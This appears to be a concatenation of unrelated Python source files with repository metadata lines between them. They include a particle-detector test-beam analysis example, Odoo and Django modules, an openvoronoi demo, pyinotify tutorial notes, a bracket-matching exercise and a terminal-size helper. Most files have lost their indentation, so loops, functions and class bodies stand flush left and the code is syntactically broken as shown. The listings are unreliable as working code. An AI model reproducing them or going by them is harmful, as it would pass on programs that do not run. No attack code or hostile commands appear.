The residuals and selected number of tracks are highly dependent on the
chi2 cut and are at least 6 um and usually < 10 um depending on the
  plane position. This is an effect of multiple scattering. The outermost planes
have a rather high residual (~ 18 um)
- When using a Kalman Filter for track building instead of an interpolation
which takes no correlations between the measurements into account, the
residuals can be improved by ~ 30 percent for the inner planes.
Setup
-----
The telescope consists of 6 planes with 15 cm clearance between the planes.
The data was taken at Desy with ~ 5 GeV/c (Run number 36).
The Mimosa26 has an active area of 21.2mm x 10.6mm and the pixel matrix
consists of 1152 columns and 576 rows (18.4um x 18.4um pixel size).
The total size of the chip is 21.5mm x 13.7mm x 0.036mm
(radiation length 9.3660734)
The matrix is divided into 4 areas. For each area the threshold can be set up
individually. The quarters are from column 0-287, 288-575, 576-863 and 864-1151.
The Mimosa26 detects ionizing particles with a density of up to
10^6 hits / cm^2 / s. The hit rate for a beam telescope is ~5 hits / frame.
'''
import os
import inspect
import logging
from testbeam_analysis import (hit_analysis, dut_alignment, track_analysis,
result_analysis)
from testbeam_analysis.tools import analysis_utils
logging.basicConfig(
level=logging.INFO, format="%(asctime)s - %(name)s - [%(levelname)-8s]\
(%(threadName)-10s) %(message)s")
def run_analysis(data_files):
    # Pixel dimensions and matrix size of the DUTs
pixel_size = [(18.4, 18.4)] * 6 # Column, row pixel pitch in um
n_pixels = [(1152, 576)] * 6 # Number of pixel on column, row
z_positions = [0., 150000, 300000, 450000, 600000, 750000] # z position in um
# Friendly names for plotting
dut_names = ("Tel_0", "Tel_1", "Tel_2", "Tel_3", "Tel_4", "Tel_5")
# Create output subfolder where all output data and plots are stored
output_folder = os.path.join(os.path.split(data_files[0])[0],
'output_eutel')
if not os.path.exists(output_folder):
os.makedirs(output_folder)
# The following shows a complete test beam analysis by calling the
    # separate functions in the correct order
# Generate noisy pixel mask for all DUTs
for i, data_file in enumerate(data_files):
hit_analysis.generate_pixel_mask(input_hits_file=data_file,
n_pixel=n_pixels[i],
pixel_mask_name='NoisyPixelMask',
pixel_size=pixel_size[i],
threshold=0.5,
dut_name=dut_names[i])
# Cluster hits from all DUTs
for i, data_file in enumerate(data_files):
hit_analysis.cluster_hits(input_hits_file=data_file,
input_noisy_pixel_mask_file=os.path.splitext(data_files[i])[0] + '_noisy_pixel_mask.h5',
min_hit_charge=0,
max_hit_charge=1,
column_cluster_distance=3,
row_cluster_distance=3,
frame_cluster_distance=1,
dut_name=dut_names[i])
# Generate filenames for cluster data
input_cluster_files = [os.path.splitext(data_file)[0] + '_clustered.h5'
for data_file in data_files]
# Correlate the row / column of each DUT
dut_alignment.correlate_cluster(input_cluster_files=input_cluster_files,
output_correlation_file=os.path.join(
output_folder, 'Correlation.h5'),
n_pixels=n_pixels,
pixel_size=pixel_size,
dut_names=dut_names)
# Create prealignment relative to the first DUT from the correlation data
input_correlation_file = os.path.join(output_folder, 'Correlation.h5')
dut_alignment.prealignment(input_correlation_file=input_correlation_file,
output_alignment_file=os.path.join(
output_folder, 'Alignment.h5'),
z_positions=z_positions,
pixel_size=pixel_size,
dut_names=dut_names,
# This data has several tracks per event and
# noisy pixel, thus fit existing background
fit_background=True,
# Tries to find cuts automatically;
                               # deactivate to do this manually
non_interactive=True)
# Merge the cluster tables to one merged table aligned at the event number
dut_alignment.merge_cluster_data(input_cluster_files=input_cluster_files,
output_merged_file=os.path.join(
output_folder, 'Merged.h5'),
n_pixels=n_pixels,
pixel_size=pixel_size)
# Apply the prealignment to the merged cluster table to create tracklets
dut_alignment.apply_alignment(
input_hit_file=os.path.join(output_folder, 'Merged.h5'),
input_alignment_file=os.path.join(output_folder, 'Alignment.h5'),
output_hit_file=os.path.join(output_folder,
'Tracklets_prealigned.h5'),
force_prealignment=True)
# Find tracks from the prealigned tracklets and stores them with quality
# indicator into track candidates table
track_analysis.find_tracks(
input_tracklets_file=os.path.join(output_folder,
'Tracklets_prealigned.h5'),
input_alignment_file=os.path.join(output_folder, 'Alignment.h5'),
output_track_candidates_file=os.path.join(
output_folder, 'TrackCandidates_prealignment.h5')
)
# The following two steps are for demonstration only.
# They show track fitting and residual calculation on
# prealigned hits. Usually you are not interested in this and will use
# the aligned hits directly.
# Step 1.: Fit the track candidates and create new track table (using the
# prealignment!)
track_analysis.fit_tracks(
input_track_candidates_file=os.path.join(
output_folder, 'TrackCandidates_prealignment.h5'),
input_alignment_file=os.path.join(output_folder, 'Alignment.h5'),
output_tracks_file=os.path.join(output_folder, 'Tracks_prealigned.h5'),
# To get unconstrained residuals do not use DUT
# hit for track fit
exclude_dut_hit=True,
# This is just for demonstration purpose, usually
# uses fully aligned hits
force_prealignment=True,
selection_track_quality=0) # We will cut on chi2
# Step 2.: Calculate the residuals to check the alignment (using the
# prealignment!)
result_analysis.calculate_residuals(
input_tracks_file=os.path.join(output_folder, 'Tracks_prealigned.h5'),
input_alignment_file=os.path.join(output_folder, 'Alignment.h5'),
output_residuals_file=os.path.join(output_folder,
'Residuals_prealigned.h5'),
n_pixels=n_pixels,
pixel_size=pixel_size,
max_chi2=2000,
# This is just for demonstration purpose
# you usually use fully aligned hits
force_prealignment=True)
# Do an alignment step with the track candidates, corrects rotations and
# is therefore much more precise than simple prealignment
dut_alignment.alignment(
input_track_candidates_file=os.path.join(
output_folder, 'TrackCandidates_prealignment.h5'),
input_alignment_file=os.path.join(output_folder, 'Alignment.h5'),
n_pixels=n_pixels,
pixel_size=pixel_size)
# Apply the alignment to the merged cluster table to create tracklets
dut_alignment.apply_alignment(
input_hit_file=os.path.join(output_folder, 'Merged.h5'),
input_alignment_file=os.path.join(output_folder, 'Alignment.h5'),
output_hit_file=os.path.join(output_folder, 'Tracklets.h5')
)
    # Find tracks from the tracklets and store them with quality indicator
# into track candidates table
track_analysis.find_tracks(
input_tracklets_file=os.path.join(output_folder, 'Tracklets.h5'),
input_alignment_file=os.path.join(output_folder, 'Alignment.h5'),
output_track_candidates_file=os.path.join(
output_folder, 'TrackCandidates.h5')
)
# Example 1: use all DUTs in fit and cut on chi2
track_analysis.fit_tracks(
input_track_candidates_file=os.path.join(output_folder,
'TrackCandidates.h5'),
input_alignment_file=os.path.join(output_folder, 'Alignment.h5'),
output_tracks_file=os.path.join(output_folder, 'Tracks_all.h5'),
# To get unconstrained residuals do not use DUT
# hit for track fit
exclude_dut_hit=True,
# We do not cut on track quality but on chi2 later
selection_track_quality=0)
# Create unconstrained residuals with chi2 cut
result_analysis.calculate_residuals(
input_tracks_file=os.path.join(output_folder, 'Tracks_all.h5'),
input_alignment_file=os.path.join(output_folder, 'Alignment.h5'),
output_residuals_file=os.path.join(output_folder, 'Residuals_all_chi2_cut.h5'),
# The chi2 cut has a large influence on
# the residuals and number of tracks,
# since the resolution is dominated by
# multiple scattering
max_chi2=500,
n_pixels=n_pixels,
pixel_size=pixel_size)
# Create unconstrained residuals
result_analysis.calculate_residuals(
input_tracks_file=os.path.join(output_folder, 'Tracks_all.h5'),
input_alignment_file=os.path.join(output_folder, 'Alignment.h5'),
output_residuals_file=os.path.join(output_folder, 'Residuals_all.h5'),
n_pixels=n_pixels,
pixel_size=pixel_size)
# Example 2: Use only 2 DUTs next to the fit DUT and cut on track quality.
# Thus the track fit is just a track interpolation with chi2 = 0.
    # This is better here due to heavily scattered tracks, where a straight line
# assumption for all DUTs is wrong.
# This leads to symmetric residuals in x and y for all DUTs between 2 DUTs
# (= DUTs: 1, 2, 3, 4)
track_analysis.fit_tracks(
input_track_candidates_file=os.path.join(output_folder,
'TrackCandidates.h5'),
input_alignment_file=os.path.join(output_folder, 'Alignment.h5'),
output_tracks_file=os.path.join(output_folder, 'Tracks_some.h5'),
selection_hit_duts=[[1, 2], # Only select DUTs next to the DUT to fit
[0, 2],
[1, 3],
[2, 4],
[3, 5],
[3, 4]],
selection_track_quality=1) # We cut on track quality
# Create unconstrained residuals
result_analysis.calculate_residuals(
input_tracks_file=os.path.join(output_folder, 'Tracks_some.h5'),
input_alignment_file=os.path.join(output_folder, 'Alignment.h5'),
output_residuals_file=os.path.join(output_folder, 'Residuals_some.h5'),
n_pixels=n_pixels,
pixel_size=pixel_size)
# Example 3: Use a Kalman Filter to build tracks. This is the best way to build
# tracks in case of heavily scattered tracks.
track_analysis.fit_tracks(
input_track_candidates_file=os.path.join(output_folder, 'TrackCandidates.h5'),
input_alignment_file=os.path.join(output_folder, 'Alignment.h5'),
output_tracks_file=os.path.join(output_folder, 'Tracks_all_Kalman.h5'),
exclude_dut_hit=True,
pixel_size=pixel_size,
n_pixels=n_pixels,
beam_energy=5000.,
material_budget=[100. / 125390., 100. / 125390., 100. / 125390., 100. / 125390., 100. / 125390., 100. / 125390.],
selection_track_quality=0,
method='Kalman')
# Create unconstrained residuals
result_analysis.calculate_residuals(
input_tracks_file=os.path.join(output_folder, 'Tracks_all_Kalman.h5'),
input_alignment_file=os.path.join(output_folder, 'Alignment.h5'),
output_residuals_file=os.path.join(output_folder, 'Residuals_all_Kalman.h5'),
n_pixels=n_pixels,
pixel_size=pixel_size,
npixels_per_bin=10,
nbins_per_pixel=50)
# Main entry point is needed for multiprocessing under windows
if __name__ == '__main__':
# Get the absolute path of example data
tests_data_folder = os.path.join(os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))), 'data')
# The location of the data files, one file per DUT
data_files = [analysis_utils.get_data(path='examples/TestBeamData_Mimosa26_DUT%d.h5' % i,
output=os.path.join(tests_data_folder,
'TestBeamData_Mimosa26_DUT%d.h5' % i)) for i in range(6)] # The first device is the reference for the coordinate system
run_analysis(data_files)
| YannickDieter/testbeam_analysis | testbeam_analysis/examples/eutelescope.py | Python | mit | 14,587 | 0.001303 |
# -*- coding: utf-8 -*-
###############################################################################
#
# ODOO (ex OpenERP)
# Open Source Management Solution
# Copyright (C) 2001-2015 Micronaet S.r.l. (<http://www.micronaet.it>)
# Developer: Nicola Riolini @thebrush (<https://it.linkedin.com/in/thebrush>)
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from . import exchange
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| Micronaet/micronaet-migration | sale_exchange/__init__.py | Python | agpl-3.0 | 1,139 | 0.002634 |
import openvoronoi as ovd
import ovdvtk
import time
import vtk
import datetime
import math
import random
import os
import sys
import pickle
import gzip
if __name__ == "__main__":
# w=2500
# h=1500
# w=1920
# h=1080
w = 1024
h = 1024
myscreen = ovdvtk.VTKScreen(width=w, height=h)
ovdvtk.drawOCLtext(myscreen, rev_text=ovd.version())
w2if = vtk.vtkWindowToImageFilter()
w2if.SetInput(myscreen.renWin)
lwr = vtk.vtkPNGWriter()
lwr.SetInputConnection(w2if.GetOutputPort())
# w2if.Modified()
# lwr.SetFileName("tux1.png")
scale = 1
myscreen.render()
random.seed(42)
far = 1
camPos = far
zmult = 3
# camPos/float(1000)
myscreen.camera.SetPosition(0, -camPos / float(1000), zmult * camPos)
myscreen.camera.SetClippingRange(-(zmult + 1) * camPos, (zmult + 1) * camPos)
myscreen.camera.SetFocalPoint(0.0, 0, 0)
vd = ovd.VoronoiDiagram(far, 120)
print ovd.version()
# for vtk visualization
vod = ovdvtk.VD(myscreen, vd, float(scale), textscale=0.01, vertexradius=0.003)
vod.drawFarCircle()
vod.textScale = 0.02
vod.vertexRadius = 0.0031
vod.drawVertices = 0
vod.drawVertexIndex = 1
vod.drawGenerators = 0
vod.offsetEdges = 1
vd.setEdgeOffset(0.05)
linesegs = 1 # switch to turn on/off line-segments
segs = []
# ovd.Point(1,1)
eps = 0.9
p1 = ovd.Point(-0.1, -0.2)
p2 = ovd.Point(0.2, 0.1)
p3 = ovd.Point(0.4, 0.2)
p4 = ovd.Point(0.6, 0.6)
p5 = ovd.Point(-0.6, 0.3)
pts = [p1, p2, p3, p4, p5]
# t_after = time.time()
# print ".done in {0:.3f} s.".format( t_after-t_before )
times = []
id_list = []
m = 0
t_before = time.time()
for p in pts:
id_list.append(vd.addVertexSite(p))
# print m," added vertex", seg_id[0]
m = m + 1
t_after = time.time()
times.append(t_after - t_before)
# exit()
# print " ",2*Nmax," point-sites sites took {0:.3f}".format(times[0])," seconds, {0:.2f}".format( 1e6*float( times[0] )/(float(2*Nmax)*float(math.log10(2*Nmax))) ) ,"us/n*log(n)"
print "all point sites inserted. ",
vd.check()
# nsegs = Nmax
# nsegs = 5 #Nmax
# n=1
t_before = time.time()
# vd.debug_on()
vd.addLineSite(id_list[0], id_list[1])
# vd.check()
# vd.debug_on()
vd.addLineSite(id_list[1], id_list[2])
# vd.check()
# vd.addLineSite( id_list[2], id_list[3])
# vd.check()
# vd.debug_on()
# vd.addLineSite( id_list[3], id_list[4])
# vd.check()
vd.debug_on()
vd.addLineSite(id_list[4], id_list[1], 10) # FIXME spikes are not allowed, so this does not complete OK
# vd.check()
t_after = time.time()
line_time = t_after - t_before
if line_time < 1e-3:
line_time = 1
times.append(line_time)
# s = id_list[nsegs]
# vd.debug_on()
# vd.addLineSite( s[0], s[1], 10)
# seg = id_list[nsegs]
# vd.addLineSite(seg[0],seg[1],10)
# 1 identify start/endvert
# 2 add line-segment edges/sites to graph
# 3 identify seed-vertex
# 4 create delete-tree
# 5 process/create null faces at start/end
# 6 create LineSite and add pseudo-edges
# 7 create NEW vertices on IN-OUT edges
# 8 add positive/start separator edge
# 9 add negative/start separator edge
# 10 add positive/end separator edge
# 5 create new vertices
# 6 add startpoint pos separator
# 7 add startpoint neg separator
# 8 add end-point pos separator
# 9 add end-point neg separator
# 10 add new edges
# 11 delete delete-tree edges
# 12 reset status
vod.setVDText2(times)
err = vd.getStat()
# print err
print "got errorstats for ", len(err), " points"
if len(err) > 1:
minerr = min(err)
maxerr = max(err)
print "min error= ", minerr
print "max error= ", maxerr
print "num vertices: ", vd.numVertices()
print "num SPLIT vertices: ", vd.numSplitVertices()
calctime = t_after - t_before
vod.setAll()
print "PYTHON All DONE."
myscreen.render()
# w2if.Modified()
# lwr.SetFileName("{0}.png".format(Nmax))
# lwr.Write()
myscreen.iren.Start()
| aewallin/openvoronoi | python_examples/spike_1.py | Python | lgpl-2.1 | 4,238 | 0.001416 |
#!/usr/bin/env python
# #To familiarize yourself with pyinotify, run a first example like this:
#
# # $ cd pyinotify-x-x-x && python setup.py build
# # $ python src/pyinotify/pyinotify.py -v my-dir-to-watch
#
# # Let's start a more detailed example. Say, we want to monitor the temp directory '/tmp' and all its subdirectories for every new file's creation or deletion. For the sake of simplicity, we only print messages for every notification on standard output.
# #
# # Now you have the choice to either receive and process the notifications in the thread who instantiate the monitoring, the main benefit is that it doesn't need to instantiate a new thread, the drawback is to block your program in this task. Or, you don't want to block your main thread, so you can handle the notifications in a new separate thread. Choose which one is the most adapted to your needs and is consistent with your constraints and design choices. Next, we will detail the two approaches:
# # Notifier ThreadedNotifier
# #
# # #First the import statements: the watch manager stores the watches and provide operations on watches. EventsCodes bring a set of codes, each code is associated to an event. ProcessEvent is the processing class.
import os
from pyinotify import WatchManager, Notifier, ThreadedNotifier, EventsCodes, ProcessEvent
wm = WatchManager()
#The following class inherit from ProcessEvent, handle notifications and process defined actions with individual processing methods whose the name is written with the specific syntax: process_EVENT_NAME where EVENT_NAME is the name of the handled event to process.
mask = EventsCodes.IN_DELETE | EventsCodes.IN_CREATE # watched events
class PTmp(ProcessEvent):
def process_IN_CREATE(self, event):
print "Create: %s" % os.path.join(event.path, event.name)
def process_IN_DELETE(self, event):
print "Remove: %s" % os.path.join(event.path, event.name)
# This statement instantiate our notifier class and realizes initializations with in particular the inotify's instantiation. The second parameter is a callable object the one which will be used to process notified events this way: PTmp()(event) where event is the notified event.
# The next statement add a watch on the first parameter and recursively on all its subdirectories, note that symlinks are not followed. The recursion is due to the optional parameter named 'rec' set to True. By default, the monitoring is limited to the level of the given directory. It returns a dict where keys are paths and values are corresponding watch descriptors (wd) and is assigned to wdd. An unique wd is attributed to every new watch. It is useful (and often necessary) to keep those wds for further updating or removing one of those watches, see the dedicated section. Obviously, if the monitored element had been a file, the rec parameter would have been ignored whatever its value.
# Let's start reading the events and processing them. Note that during the loop we can freely add, update or remove any watches, we can also do anything we want, even stuff unrelated to pyinotify. We call the stop() method when we want stop monitoring.
def watch_blocking(watchdir):  # blocking variant: handle the notifications in the calling thread
notifier = Notifier(wm, PTmp())
watchdir = os.path.abspath(watchdir)
wdd = wm.add_watch(watchdir, mask, rec=True)
while True: # loop forever
try: # process the queue of events as explained above
notifier.process_events()
if notifier.check_events():
notifier.read_events()
# read notified events and enqeue them
# you can do some tasks here...
except KeyboardInterrupt: # destroy the inotify's instance on this interrupt (stop monitoring)
notifier.stop()
break
def watch_threaded(watchdir):  # threaded variant: notifications are handled in a separate thread
#The second line starts the new thread, doing actually nothing as no directory or file is being monitored.
notifier = ThreadedNotifier(wm, PTmp())
notifier.start()
watchdir = os.path.abspath(watchdir)
wdd = wm.add_watch(watchdir, mask, rec=True)
####
####At any moment we can for example remove the watch on '/tmp' like this:
def remove_watch_examples(wm, wdd, watchdir, notifier):
    if wdd[watchdir] > 0:  # test if the wd is valid, this test is not mandatory
        wm.rm_watch(wdd[watchdir])
    #### Note that its subdirectories (if any) are still being watched. If we wanted to remove '/tmp'
    #### and all the watches on its subdirectories, we could have done it like that:
    wm.rm_watch(wdd[watchdir], rec=True)
    # rm_watch also accepts a list of watch descriptors:
    wm.rm_watch(wdd.values())
    notifier.stop()
# That is, most of the code is written, next, we can add, update or remove watches on files or directories with the same principles.
## The only remaining important task is to stop the thread when we wish stop monitoring, it will automatically destroy the inotify's instance. Call the following method:
# The EventsCodes Class top
# Edited Sun, 26 Nov 2006 10:53
# Event Name Is an Event Description
# IN_ACCESS Yes file was accessed.
# IN_ATTRIB Yes metadata changed.
# IN_CLOSE_NOWRITE Yes unwrittable file was closed.
# IN_CLOSE_WRITE Yes writtable file was closed.
# IN_CREATE Yes file/dir was created in watched directory.
# IN_DELETE Yes file/dir was deleted in watched directory.
# IN_DELETE_SELF Yes watched item itself was deleted.
# IN_DONT_FOLLOW No don't follow a symlink (lk 2.6.15).
# IN_IGNORED Yes raised on watched item removing. Probably useless for you, prefer instead IN_DELETE*.
# IN_ISDIR No event occurred against directory. It is always piggybacked to an event. The Event structure automatically provide this information (via .is_dir)
# IN_MASK_ADD No to update a mask without overwriting the previous value (lk 2.6.14). Useful when updating a watch.
# IN_MODIFY Yes file was modified.
# IN_MOVE_SELF Yes watched item itself was moved, currently its full pathname destination can only be traced if its source directory and destination directory are both watched. Otherwise, the file is still being watched but you cannot rely anymore on the given path (.path)
# IN_MOVED_FROM Yes file/dir in a watched dir was moved from X. Can trace the full move of an item when IN_MOVED_TO is available too, in this case if the moved item is itself watched, its path will be updated (see IN_MOVE_SELF).
# IN_MOVED_TO Yes file/dir was moved to Y in a watched dir (see IN_MOVE_FROM).
# IN_ONLYDIR No only watch the path if it is a directory (lk 2.6.15). Usable when calling .add_watch.
# IN_OPEN Yes file was opened.
# IN_Q_OVERFLOW Yes event queued overflowed. This event doesn't belongs to any particular watch.
# IN_UNMOUNT Yes backing fs was unmounted. Notified to all watches located on this fs.
#
#
# wd (int): is the Watch Descriptor, it is an unique identifier who represents the watched item through which this event could be observed.
# path (str): is the complete path of the watched item as given in parameter to the method .add_watch.
# name (str): is not None only if the watched item is a directory, and if the current event has occurred against an element included in that directory.
# mask (int): is a bitmask of events, it carries all the types of events watched on wd.
# event_name (str): readable event name.
# is_dir (bool): is a boolean flag set to True if the event has occurred against a directory.
# cookie (int): is a unique identifier permitting to tie together two related 'moved to' and 'moved from' events.
#
class MyProcessing(ProcessEvent):
def __init__(self):
"""
Does nothing in this case, but you can as well implement this constructor
        and you don't need to explicitly call its base class constructor.
"""
pass
    def process_IN_DELETE(self, event):
"""
This method process a specific kind of event (IN_DELETE). event
is an instance of Event.
"""
print '%s: deleted' % os.path.join(event.path, event.name)
    def process_IN_CLOSE(self, event):
"""
This method is called for these events: IN_CLOSE_WRITE,
IN_CLOSE_NOWRITE.
"""
print '%s: closed' % os.path.join(event.path, event.name)
    def process_default(self, event):
"""
Ultimately, this method is called for all others kind of events.
This method can be used when similar processing can be applied
to various events.
"""
print 'default processing'
# Explanations and details:
#
# IN_DELETE have its own method providing a specific treatment. We associate an individual processing method by providing a method whose the name is written with the specific syntax: process_EVENT_NAME where EVENT_NAME is the name of the handled event to process. For the sake of simplicity, our two methods are very basics they only print messages on standart output:
# There are related events which needs most of the time the same treatment. It would be annoying to have to implement two times the same code. In this case we can define a common method. For example we want to share the same method for these two related events:
#
# mask = EventsCodes.IN_CLOSE_WRITE | EventsCodes.IN_CLOSE_NOWRITE
#
# Then it's enough to provide a single processing method named process_IN_CLOSE according to the general syntax process_IN_FAMILYBASENAME. The two previous events will be processed by this method. In this case, beware to not implement process_IN_CLOSE_WRITE or process_IN_CLOSE_NOWRITE, because these methods have an higher precedence (see below), thereby are looked first and would have been called instead of process_IN_CLOSE (for a complete example see: src/examples/close.py).
# It only makes sense to define process_IN_Q_OVERFLOW when its class instance is given to Notifier, indeed it could never be called from a processed object associated to a watch, because this event isn't associated to any watch.
# EventsCodes.ALL_EVENTS isn't an event by itself, that means that you don't have to implement the method process_ALL_EVENTS (even worst it would be wrong to define this method), this is just an alias to tell the kernel we want to be notified for all kind of events on a given watch. The kernel raises individual events (with the IN_ISDIR flag if necessary). Instead, if we need to apply the same actions whatever the kind of event, we should implement a process_default method (for a complete example see: src/examples/simple.py).
# Processing methods lookup's order (ordered by increasing order of priority): specialized method (ex: process_IN_CLOSE_WRITE) first, then family method (ex: process_IN_CLOSE), then default method (process_default).
# One more thing: say you redifine the method process_default which contains the instruction os.ismount(my-mount-point), it would be for example a mistake having this method called for every event IN_OPEN occurred in /etc. Because, one particularity of os.ismount is to check in /etc/mtab if the partition is mounted, so we could easily imagine the kind of endless situation: call process_IN_OPEN, open /etc/mtab, call process_IN_OPEN, open /etc/mtab ... loop forever.
#
# Whenever possible you should process your notifications this way, with a single processing object. It is easy to imagine the benefits to have to deal with only one instance (efficiency, data sharing,...):
def watch_single_processor(watchdir):
    processor = MyProcessing()  # one shared processing instance, as recommended above
    path = os.path.abspath(watchdir)
    notifier = Notifier(wm, processor)
    mask = EventsCodes.ALL_EVENTS
    wm.add_watch(path, mask, proc_fun=processor)
    return notifier
# Read notifications, process events.
# watch_manager is an instance of WatchManager.
# default_proc_funcis an instance of ProcessEvent or one of its subclasses.
# Notifier(watch_manager, default_proc_func=ProcessEvent())
# check_events(timeout=4) #=> None  # Check for new events available to read.
#     timeout (int): timeout passed on to select.select().
# process_events() #=> None  # Routine for processing events from queue by calling their associated
#     processing function (instance of ProcessEvent or one of its subclasses).
# read_events() #=> None  # Read events from device and enqueue them, waiting to be processed.
# stop() #=> None  # Stop the notifications.
# ThreadedNotifier(watch_manager, default_proc_func=ProcessEvent())
# This notifier inherits from threading.Thread and from Notifier, instantiating a separate thread, and providing standart Notifier functionalities. This is a threaded version of Notifier.
# watch_manager is an instance of WatchManager.
# default_proc_funcis an instance of ProcessEvent or one of its subclasses.
# inherits all the methods of Notifier but override the stop() method.
# start() #=> None  # Start the new thread, start events notifications.
# stop() #=> None  # Stop the thread, stop the notifications.
#Represent a watch, i.e. a file or directory being watched.
# def Watch(wd, path, mask, proc_func, auto_add):
# wd(int) = wd #Watch Descriptor.
# path = os.path.abspath(watchdir)
# #path(str) = path # Path of the file or directory being watched.
# mask(int) = mask #Mask.
# proc_fun(ProcessEvent) = proc_func #Processing object.
# auto_add(bool) = auto_add #Automatically add watches on creation of directories.
#The Watch Manager lets the client add a new watch, store the active watches, and provide operations on these watches.
##Add watch(s) on given path(s) with the specified mask.
# WatchManager API (reference notes, not runnable code):
#   add_watch(path, mask, proc_fun=None, rec=False, auto_add=False) #=> dict
#       path (str or list of str): path(s) to watch; the path can either be a file or a directory.
#       mask (int): bitmask of events.
#       proc_fun (ProcessEvent): processing object (must be callable). Will be called if provided,
#           otherwise the notifier's default_proc_func will be called.
#       rec (bool): recursively add watches on the given path and on all its subdirectories.
#       auto_add (bool): automatically add watches on newly created directories in the watch's path.
#   update_watch(wd, mask=None, proc_fun=None, rec=False, auto_add=False) #=> dict
#       Update existing watch(s). All these parameters are updatable.
#   rm_watch(wd, rec=False) #=> dict  # Remove watch(s).
#   get_wd(path) #=> int  # Return the watch descriptor associated to path.
#   get_path(wd) #=> str  # Return the path associated to wd; if wd is invalid, None is returned.
def watch_admin_examples(wm, mask, new_mask):
    # add_watch returns {path: wd, ...}; a wd > 0 means the watch was added successfully
    ra = wm.add_watch('/a-dir', mask)
    if ra['/a-dir'] > 0: print "added"
    # update_watch wd (or list of wds) -> {wd1: success, wd2: success, ...}
    # where success is True if the op on wdx succeeded, False otherwise
    ru = wm.update_watch(ra['/a-dir'], new_mask)
    if ru['/a-dir']: print "updated"
    # rm_watch wd (or list of wds) -> {wd1: success, wd2: success, ...}
    # where success is True if the op on wdx succeeded, False otherwise
    rr = wm.rm_watch(ra['/a-dir'])
    if rr['/a-dir']: print "deleted"
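# Hypothetical entry point tying the sketches above together; the default path and
# the choice of the blocking variant are illustration-only assumptions.
if __name__ == '__main__':
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else '/tmp'
    watch_blocking(target)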
| relic7/prodimages | python/DirWatchManager.py | Python | mit | 15,047 | 0.009238 |
"""
send mail with html template
"""
import logging
from django.template.loader import render_to_string
from common.notify import Notify
class Email:
def __init__(self):
self.logger = logging.getLogger('userquery')
def send(self, data):
self.logger.info("Sending mail by template %s" % data["template"])
subject = "UserQuery - %s" % data["subject"]
body = render_to_string(data["template"], data)
Notify().send_email(subject, body, data["email"])
| linea-it/dri | api/userquery/email.py | Python | gpl-3.0 | 519 | 0.007707 |
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Tangible()
result.template = "object/tangible/lair/base/shared_poi_all_lair_thicket_large_evil_fire_red.iff"
result.attribute_template_id = -1
result.stfName("lair_n","thicket")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result | obi-two/Rebelion | data/scripts/templates/object/tangible/lair/base/shared_poi_all_lair_thicket_large_evil_fire_red.py | Python | mit | 468 | 0.047009 |
# python3
import sys
class Bracket:
def __init__(self, bracket_type, position):
self.bracket_type = bracket_type
self.position = position
def Match(self, c):
if self.bracket_type == '[' and c == ']':
return True
if self.bracket_type == '{' and c == '}':
return True
if self.bracket_type == '(' and c == ')':
return True
return False
if __name__ == "__main__":
text = sys.stdin.read()
opening_brackets_stack = []
index = []
for i, next in enumerate(text):
match = True
if next == '(' or next == '[' or next == '{':
# Process opening bracket, write your code here
opening_brackets_stack.append(Bracket(next,i))
index.append(i+1)
if next == ')' or next == ']' or next == '}':
if len(opening_brackets_stack) == 0 or opening_brackets_stack.pop().Match(next) == False:
match = False
index.append(i+1)
break
index.pop()
# Process closing bracket, write your code here
# Printing answer, write your code here
if match == False or len(opening_brackets_stack) > 0:
print(index.pop())
else:
print("Success") | supermikol/coursera | Data Structures/Week 1/check_brackets_in_code/check_brackets.py | Python | mit | 1,323 | 0.005291 |
#!/usr/bin/env python
# Source: https://gist.github.com/jtriley/1108174
import os
import shlex
import struct
import platform
import subprocess
def get_terminal_size():
""" getTerminalSize()
- get width and height of console
- works on linux,os x,windows,cygwin(windows)
originally retrieved from:
http://stackoverflow.com/questions/566746/how-to-get-console-window-width-in-python
"""
current_os = platform.system()
tuple_xy = None
if current_os == 'Windows':
tuple_xy = _get_terminal_size_windows()
if tuple_xy is None:
tuple_xy = _get_terminal_size_tput()
# needed for window's python in cygwin's xterm!
if current_os in ['Linux', 'Darwin'] or current_os.startswith('CYGWIN'):
tuple_xy = _get_terminal_size_linux()
if tuple_xy is None:
tuple_xy = (80, 25) # default value
return tuple_xy
def _get_terminal_size_windows():
try:
from ctypes import windll, create_string_buffer
# stdin handle is -10
# stdout handle is -11
# stderr handle is -12
h = windll.kernel32.GetStdHandle(-12)
csbi = create_string_buffer(22)
res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi)
if res:
(bufx, bufy, curx, cury, wattr,
left, top, right, bottom,
maxx, maxy) = struct.unpack("hhhhHhhhhhh", csbi.raw)
sizex = right - left + 1
sizey = bottom - top + 1
return sizex, sizey
except:
pass
def _get_terminal_size_tput():
# get terminal width
# src: http://stackoverflow.com/questions/263890/how-do-i-find-the-width-height-of-a-terminal-window
try:
        # check_call only returns the exit status; check_output captures tput's stdout
        cols = int(subprocess.check_output(shlex.split('tput cols')))
        rows = int(subprocess.check_output(shlex.split('tput lines')))
return (cols, rows)
except:
pass
def _get_terminal_size_linux():
def ioctl_GWINSZ(fd):
try:
import fcntl
import termios
cr = struct.unpack('hh',
fcntl.ioctl(fd, termios.TIOCGWINSZ, '1234'))
return cr
except:
pass
cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)
if not cr:
try:
fd = os.open(os.ctermid(), os.O_RDONLY)
cr = ioctl_GWINSZ(fd)
os.close(fd)
except:
pass
if not cr:
try:
cr = (os.environ['LINES'], os.environ['COLUMNS'])
except:
return None
return int(cr[1]), int(cr[0])
if __name__ == "__main__":
sizex, sizey = get_terminal_size()
print('width =', sizex, 'height =', sizey)
